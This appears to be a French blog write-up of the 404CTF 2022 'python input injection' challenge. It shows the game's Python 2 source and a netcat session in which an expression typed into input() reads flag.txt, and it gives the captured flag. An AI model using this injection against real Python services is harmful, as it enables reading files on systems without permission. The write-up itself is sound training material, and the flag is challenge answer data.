dimanche 11 septembre 2022

404CTF 2022 - python input injection

Python injection

Hallebarde a mis en place sa variante du Pierre-papier-ciseaux. À ce jour, personne de nos services n'est parvenu à vaincre l'ordinateur. Montrez-leur de quoi vous êtes capable en récupérant leur précieux flag.txt !

#!/usr/bin/python2.7 -u
# -*- coding: utf-8 -*-

choix = {1 : "pierre", 2 : "papier", 3 : "Hallebarde"}

def bonjour():
	print("Bienvenue sur pierre-papier-Hallebarde !")
	print("La pierre bat la Hallebarde, le papier bat la pierre et la Hallebarde bat le papier")
	print("Pour jouer entrez un chiffre entre 1 et 3 : ")
	print("1 : pierre")
	print("2 : papier")
	print("3 : Hallebarde")

def jouer():
	choix_utilisateur = int(input("Choix ?\n> "))

	if choix_utilisateur == 1:
		choix_ordi = 2
	elif choix_utilisateur == 2:
		choix_ordi = 3
	elif choix_utilisateur == 3:
		choix_ordi = 1
	else:
		print("Choix invalide. Vous avez perdu")
		exit(1)

	print("Vous avez choisi : " + choix[choix_utilisateur] + ". L'ordinateur a choisi : " + choix[choix_ordi] +".")
	if decision(choix_utilisateur, choix_ordi) == 1:
		print("Vous avez gagné !!! Incroyable !")
		f = open("flag.txt", "r")
		print(f.readline())
		f.close()
	else :
		print("Vous avez perdu...")

def decision(joueur1, joueur2):

	if joueur1 == joueur2:
		return 2
	if joueur1 == 1 and joueur2 == 2:
		return 2
	if joueur1 == 1 and joueur2 == 3:
		return 1
	if joueur1 == 2 and joueur2 == 1:
		return 1
	if joueur1 == 2 and joueur2 == 3:
		return 2
	if joueur1 == 3 and joueur2 == 1:
		return 2
	if joueur1 == 3 and joueur2 == 2:
		return 1
	return 2

def main():
	bonjour()
	while True:
		jouer()


if __name__ == "__main__":
	main()

L'injection:

nc challenge.404ctf.fr 30806
Bienvenue sur pierre-papier-Hallebarde !
La pierre bat la Hallebarde, le papier bat la pierre et la Hallebarde bat le papier
Pour jouer entrez un chiffre entre 1 et 3 : 
1 : pierre
2 : papier
3 : Hallebarde
Choix ?
> decision(choix.update({1:open("flag.txt", "r").readline()}),3)
Vous avez choisi : papier. L'ordinateur a choisi : Hallebarde.
Vous avez perdu...
Choix ?
> 1
Vous avez choisi : 404CTF{cH0iX_nUm3r0_4_v1c701r3}
. L'ordinateur a choisi : papier.
Vous avez perdu...
Choix ?

Flag: 404CTF{cH0iX_nUm3r0_4_v1c701r3}

Publié par à

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)